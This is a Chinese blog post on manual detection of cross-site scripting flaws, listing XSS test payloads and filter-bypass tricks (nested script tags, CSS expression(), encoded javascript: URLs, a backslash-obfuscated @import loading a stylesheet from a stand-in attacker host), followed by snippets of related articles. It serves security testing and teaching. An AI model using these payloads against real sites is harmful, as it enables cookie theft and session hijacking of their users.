XSS漏洞手工检测

最新推荐文章于 2024-08-07 07:15:00 发布
最新推荐文章于 2024-08-07 07:15:00 发布
阅读量6.7k 收藏 17
点赞数 3
分类专栏: web安全 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzkkoo8/article/details/78812845
版权

xss漏洞手工检测

2017年12月14日 17:44:57

1、基本检测

'"<>&空格 \\看有没有逃逸
常用语句
"/><script>alert(document.cookie)</script><!--
<script>alert(document.cookie)</script><!--
"onclick="alert(document.cookie)
<script>alert("XSS")</script>
<script src="http://xss.io/a.js"></script>
<div onclick="alert('xss')">
<div onmouseenter="alert('xss')">

2、绕过技巧

常用绕过

另一个绕过的办法就是在属性和= 之间插入一个空格:
<div onclick ="alert('xss')">
<scr<script>ipt>alert("XSS")</scr<script>ipt>
行内样式
<div style="color: expression(alert('XSS'))">
<div style="color: '<'; color: expression(alert('XSS'))">
<a href="java&#115;cript:alert('xss')">link</a>     //url中输入
<a href='vbscript:MsgBox("XSS")'>link</a>       //老IE或者兼容模式的IE11
'-confirm`1`-'
'-confirm(1)-'

利用字符编码
%c1;alert(/xss/);//

绕过长度限制
"onclick=alert(1)//
"><!--
--><script>alert(xss);<script>

CSS import绕过
IE 浏览器支持在 CSS 中扩展 JavaScript,这种技术称为动态特性(dynamic properties)。允许攻击者加载一个外部 CSS 样式表是相当危险的,因为攻击者现在可以在原始页面中执行

<style>
@import url("http://attacker.org/malicious.css");
</style>
malicious.css:
body {
    color: expression(alert('XSS'));
}
为了绕过对 @import 的过滤,可以在 CSS 中使用反斜杠进行绕过:
<style>
@imp\ort url("http://attacker.org/malicious.css");
</style>
IE 浏览器会接受反斜杠,但是我们绕过了过滤器。
zzkkoo8
关注
专栏目录
xss漏洞讲解.pdf
04-22
4. 手工测试:文档提到了手工测试反射型、存储型和DOM型XSS漏洞的方法,这包括构造包含恶意脚本的URL、在表单中输入恶意代码、在DOM环境中注入脚本等方式。通过手工测试可以帮助安全人员更好地理解和掌握XSS漏洞的...
(27)【xss绕过】一般测试步骤、绕过方法:触发事件、干扰、编码……
04-03 6951
XSS绕过-合集】
安全测试之xss漏洞检测与防御
HSS919的博客
03-13 4776
手工检测重点要考虑数据输入的地方,且需要清楚输入的数据输出到什么地方。在检测的开始,可以输入一些敏感字符,比如“、()”等,提交后查看网页源代码的变化以发现输入被输出到什么地方,且可以发现相关敏感字符是否被过滤。手工检测结果相对准确,但效率较低。
查看有无XSS漏洞验证
最新发布
weixin_67840381的博客
08-07 415
confirm(/xss/)</script>",验证页面是否弹框。7、返回到http://ip/xss/level1.php?name=test页面,利用XSS漏洞验证其他弹窗语句,在test后输入"<script>prompt(/xss/)
XSS手工测试阶段式小结
L1m93的博客
03-29 1983
XSS攻击方式千变万化,越是学习这一块的知识就越感到自己对这一方面知识的匮乏。也如海绵一般,我也渴望汲取更多新的知识。文章仅仅是作为一个阶段式的小结。 反射型XSS 在用户单击时触发,只执行一次。 存在:搜索框,用户登陆口 攻击成本比存储型XSS高。 经过后端,不经过数据库。 数据流向:浏览器》后端》浏览器 存储型XSS 比反射型XSS威胁性高。 存在:留言,评论,博...
【渗透测试】XSS手工挖掘到防御
ssrf
08-05 733
一、概述 XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后,攻击者可能得到包括但不限于更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容 危害: 盗取管理员cookie XSS蠕虫 挂马(水坑攻击) 键盘记录等等。。。。。。 二、XSS分类 1
Web安全XSS漏洞的测试(防止 黑客利用此漏洞.)
网络安全领域___专研者.
03-17 1万+
XSS漏洞的概括: XSS又叫CSS(Cross Site Script)跨站脚本攻击,指的是攻击者在Web页面,插入恶意JS代码,当用户浏览该页之时,嵌入其中JS代码就会被执行,从而达到攻击的目的.(包含:收集用户的Cookie,添加账号,修改密码,提高用户权限等等.)
手工检测注入点
07-19
在IT安全领域,手工检测注入点是一项至关重要的技能,它涉及到对系统或应用程序的深入理解和潜在漏洞的识别。本文将详细解析这个主题,以便帮助学习者掌握如何手工检测注入点,提升网络安全防护能力。 首先,我们...
戏耍XSS的一些技巧
02-20
当你手工或者软件挖到一个页面的xss时(无论是反射xss或者储蓄xss都可以),这个时候想要深入的利用这个漏洞,该怎么做呢?用WebRTC来内网端口检测?盗取cookies(登陆页面和注册页面一般都不会有用户cookies)?用...
基于代理模式的SQL注入漏洞检测技术研究.pdf
09-19
基于代理模式的SQL注入漏洞检测技术研究主要涉及以下知识点: 1. SQL注入漏洞的基本概念 ...这种方法不仅适用于SQL注入漏洞检测,同时也展现了在XSS漏洞检测中的良好效果,为Web应用安全提供了新的解决方案。
Web安全测试 — 手工安全测试方法&修改建议
dlvp37214的博客
06-27 165
常见问题 1.XSS(CrossSite Script)跨站脚本攻击 XSS(CrossSite Script)跨站脚本攻击。它指的是恶意攻击者往Web 页面里插入恶意 html代码,当用户浏览该页之时,嵌入其中Web 里面的html 代码会被执行,从而达 到恶意用户的特殊目的。 测试方法: 在数据输入界面,添加记录输入:<script>alert(/30141...
XSS漏洞测试工具
02-10
XSS是一种非常常见的漏洞类型,它的影响非常的广泛并且很容易的就能被检测到。 攻击者可以在未经验证的情况下,将不受信任的JavaScript片段插入到你的应用程序中,然后这个JavaScript将被访问目标站点的受害者执行
xss注入
qq_63267612的博客
07-03 1501
跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets,CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户目的。 XSS危害:XSS分类测试管理界面是否存在XSS: 在用户名框中输入">(闭合input标签) 结果,界面弹窗,证明该系统存在XSS注入 上一步验证得出,该页面存在XSS漏洞。接下来针对该漏洞
XSS漏洞测试案例分享(原创)
gaomei2009的专栏
04-14 1894
直到今天才发现,只有写作才能让你把知识记牢。只有写作才能把日常工作的积累,不写记录,好记性不如烂笔头。以后每周会把自己工作中的渗透测试分享出来,对自己是一个积累的过程,对大家是一个共享。 一、工具扫描 个人建议使用XRAY工具,可以非常快速发现XSS漏洞,大把节约了手工渗透的时间。 二、手工测试 在应用系统中,在有人机交互的地方输入相关JS语句,例如 <img src=1 onerror=alert(1)> <script>alert("XSS")&l...
XSS漏洞详解
热门推荐
xcxhzjl的博客
11-18 2万+
一、XSS漏洞原理 XSS,即跨站脚本攻击,是指攻击者利用Web服务器中的应用程序或代码漏洞,在页面中嵌入客户端脚本(通常是一段由JavaScript编写的恶意代码,少数情况下还有ActionScript、VBScript等语言),当信任此Web服务器的用户访问Web站点中含有恶意脚本代码的页面或打开收到的URL链接时,用户浏览器会自动加载并执行该恶意代码,从而达到攻击的目的。 当应用程序没有对用户提交的内容进行验证和重新编码,而是直接呈现给网站的访问者时,就可能会触发XSS攻击。 二、XSS漏洞的危
XSS跨站脚本攻击之——XSS手工及工具挖掘
温柔小薛的博客
04-04 1273
XSS手工及工具挖掘 XSS可能存在的地方 HTML context Attribute Context URL Context Style Context Script Context XSS测试方法 工具扫描:APPscan、AWVS Cross site scripting类型 验证的时候,标准是弹出对话框,否则基本是误报 手工测试:Burpsuite、firefox...
xss妙用,快速测试xss漏洞
椰树ii
05-24 1万+
#介绍# 这篇文章的主要目的是去给应用安全测试者提供一份xss漏洞检测指南。文章的初始内容由RSnake提供给OWASP,从他的xss备忘录:http://ha.ckers.org/xss.html 。目前这个网页已经重定向到我们这里,我们打算维护和完善它。OWASP的第一个防御备忘录项目:the XSS (Cross Site Scripting) Prevention Cheat Shee
Web安全测试之——XSS漏洞
释梦燃的博客
04-19 4907
XSS攻击:跨站脚本攻击(Cross Site Scripting),它是Web程序中最常见的漏洞XSS攻击是指攻击者在网页中嵌入客户端脚本(例如JavaScript), 当用户浏览此网页时,脚本就会在用户的浏览器上执行,从而达到攻击者的目的。比如获取用户的Cookie,导航到恶意网站,携带木马等。
XSS————1、XSS测试平台搭建
Fly_鹏程万里
05-13 5841
安装 (1)安装http server与php环境(ubuntu: sudo apt-get install apache2 php5 或 sudo apt-get install apache2 php7.0 libapache2-mod-php7.0) (2)上传所有文件至空间根目录 (3)访问目标网站 根据提示配置xss平台 在配置之前,需要赋予xss的数据存储...
xss漏洞的原理以及如何验证存在xss漏洞
05-12
XSS漏洞(Cross Site Scripting)是一种常见的Web安全漏洞,攻击者通过注入恶意脚本代码到网页中,从而实现获取用户敏感信息或者控制用户账户的目的。 XSS漏洞的原理是,攻击者利用网页中未过滤或不完整过滤的用户输入,将恶意脚本代码注入到网页中。当用户访问这个网页时,浏览器会执行这些恶意脚本,从而达到攻击者预期的效果。 验证是否存在XSS漏洞可以通过以下几种方式: 1.手工测试:通过在网页中输入特定字符、标签、脚本等内容,观察是否能够在网页中展现出来。如果能够展现出来,则说明网页存在XSS漏洞。 2.使用在线工具:如XSStrike、XSS Hunter等工具,可以帮助检测网页是否存在XSS漏洞,并提供相应的修复建议。 3.使用浏览器插件:如XSS Validator、Tamper Data等插件,可以帮助检测网页中的输入是否存在可疑字符,并提供相应的修复建议。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值